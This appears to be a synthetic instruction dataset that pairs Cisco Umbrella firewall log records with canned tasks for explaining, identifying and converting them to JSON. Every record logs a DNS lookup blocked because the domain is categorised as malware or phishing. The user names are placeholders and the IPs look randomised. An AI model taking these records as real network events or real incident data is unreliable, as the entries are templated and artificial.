WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"176.7.198.1","externalIp":"28.145.115.161","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=176.7.198.1 ::: serverIP=28.145.115.161 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-18T20:29:12.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 176.7.198.1 serverIP: 28.145.115.161 userName: bob
Explain this syslog message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"9.15.181.119","externalIp":"44.110.171.173","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"johndoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=9.15.181.119 ::: serverIP=44.110.171.173 ::: userName=johndoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "rum.browser-intake-foxbusiness.com", "message": "WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"9.15.181.119\",\"externalIp\":\"44.110.171.173\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"rum.browser-intake-foxbusiness.com\",\"originLabel\":\"johndoe\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-03-30T16:39:53.000Z\"} ::: clientIP=9.15.181.119 ::: serverIP=44.110.171.173 ::: userName=johndoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "rum.browser-intake-foxbusiness.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-03-30T16:39:53.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "Malware", "streamName": "OpenDNS Detection", "clientIP": "9.15.181.119", "serverIP": "44.110.171.173", "userName": "johndoe" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"9.15.181.119","externalIp":"44.110.171.173","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"johndoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=9.15.181.119 ::: serverIP=44.110.171.173 ::: userName=johndoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"9.15.181.119","externalIp":"44.110.171.173","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"johndoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=9.15.181.119 ::: serverIP=44.110.171.173 ::: userName=johndoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: rum.browser-intake-foxbusiness.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: rum.browser-intake-foxbusiness.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-03-30T16:39:53.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: Malware streamName: OpenDNS Detection clientIP: 9.15.181.119 serverIP: 44.110.171.173 userName: johndoe
Explain this syslog message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"71.41.77.34","externalIp":"246.213.220.140","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=71.41.77.34 ::: serverIP=246.213.220.140 ::: userName=alice ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "rum.browser-intake-foxbusiness.com", "message": "WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"71.41.77.34\",\"externalIp\":\"246.213.220.140\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"rum.browser-intake-foxbusiness.com\",\"originLabel\":\"alice\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-03-30T16:39:53.000Z\"} ::: clientIP=71.41.77.34 ::: serverIP=246.213.220.140 ::: userName=alice ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "rum.browser-intake-foxbusiness.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-03-30T16:39:53.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "Malware", "streamName": "OpenDNS Detection", "clientIP": "71.41.77.34", "serverIP": "246.213.220.140", "userName": "alice" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"71.41.77.34","externalIp":"246.213.220.140","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=71.41.77.34 ::: serverIP=246.213.220.140 ::: userName=alice ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"71.41.77.34","externalIp":"246.213.220.140","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=71.41.77.34 ::: serverIP=246.213.220.140 ::: userName=alice ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: rum.browser-intake-foxbusiness.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: rum.browser-intake-foxbusiness.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-03-30T16:39:53.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: Malware streamName: OpenDNS Detection clientIP: 71.41.77.34 serverIP: 246.213.220.140 userName: alice
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"113.162.30.150","externalIp":"184.110.38.220","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=113.162.30.150 ::: serverIP=184.110.38.220 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"113.162.30.150\",\"externalIp\":\"184.110.38.220\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"fish\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-17T14:43:12.000Z\"} ::: clientIP=113.162.30.150 ::: serverIP=184.110.38.220 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-17T14:43:12.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "113.162.30.150", "serverIP": "184.110.38.220", "userName": "fish" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"113.162.30.150","externalIp":"184.110.38.220","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=113.162.30.150 ::: serverIP=184.110.38.220 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"113.162.30.150","externalIp":"184.110.38.220","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=113.162.30.150 ::: serverIP=184.110.38.220 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-17T14:43:12.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 113.162.30.150 serverIP: 184.110.38.220 userName: fish
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"198.72.35.145","externalIp":"192.105.179.88","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=198.72.35.145 ::: serverIP=192.105.179.88 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"198.72.35.145\",\"externalIp\":\"192.105.179.88\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"fish\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-17T14:43:12.000Z\"} ::: clientIP=198.72.35.145 ::: serverIP=192.105.179.88 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-17T14:43:12.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "198.72.35.145", "serverIP": "192.105.179.88", "userName": "fish" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"198.72.35.145","externalIp":"192.105.179.88","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=198.72.35.145 ::: serverIP=192.105.179.88 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"198.72.35.145","externalIp":"192.105.179.88","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=198.72.35.145 ::: serverIP=192.105.179.88 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-17T14:43:12.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 198.72.35.145 serverIP: 192.105.179.88 userName: fish
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"220.136.212.131","externalIp":"191.177.194.114","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=220.136.212.131 ::: serverIP=191.177.194.114 ::: userName=charlie ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"220.136.212.131\",\"externalIp\":\"191.177.194.114\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"charlie\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T16:28:22.000Z\"} ::: clientIP=220.136.212.131 ::: serverIP=191.177.194.114 ::: userName=charlie ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-18T16:28:22.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "220.136.212.131", "serverIP": "191.177.194.114", "userName": "charlie" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"220.136.212.131","externalIp":"191.177.194.114","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=220.136.212.131 ::: serverIP=191.177.194.114 ::: userName=charlie ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"220.136.212.131","externalIp":"191.177.194.114","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=220.136.212.131 ::: serverIP=191.177.194.114 ::: userName=charlie ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-18T16:28:22.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 220.136.212.131 serverIP: 191.177.194.114 userName: charlie
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"250.91.177.51","externalIp":"119.89.193.209","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=250.91.177.51 ::: serverIP=119.89.193.209 ::: userName=fish ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"250.91.177.51\",\"externalIp\":\"119.89.193.209\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"fish\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T16:28:22.000Z\"} ::: clientIP=250.91.177.51 ::: serverIP=119.89.193.209 ::: userName=fish ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-18T16:28:22.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "250.91.177.51", "serverIP": "119.89.193.209", "userName": "fish" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"250.91.177.51","externalIp":"119.89.193.209","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=250.91.177.51 ::: serverIP=119.89.193.209 ::: userName=fish ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"250.91.177.51","externalIp":"119.89.193.209","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=250.91.177.51 ::: serverIP=119.89.193.209 ::: userName=fish ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-18T16:28:22.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 250.91.177.51 serverIP: 119.89.193.209 userName: fish
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"131.83.161.58","externalIp":"219.46.163.18","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"nighthawk","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=131.83.161.58 ::: serverIP=219.46.163.18 ::: userName=nighthawk ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"131.83.161.58\",\"externalIp\":\"219.46.163.18\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"nighthawk\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T20:29:12.000Z\"} ::: clientIP=131.83.161.58 ::: serverIP=219.46.163.18 ::: userName=nighthawk ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-18T20:29:12.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "131.83.161.58", "serverIP": "219.46.163.18", "userName": "nighthawk" }
Create a JSON artifact from the message
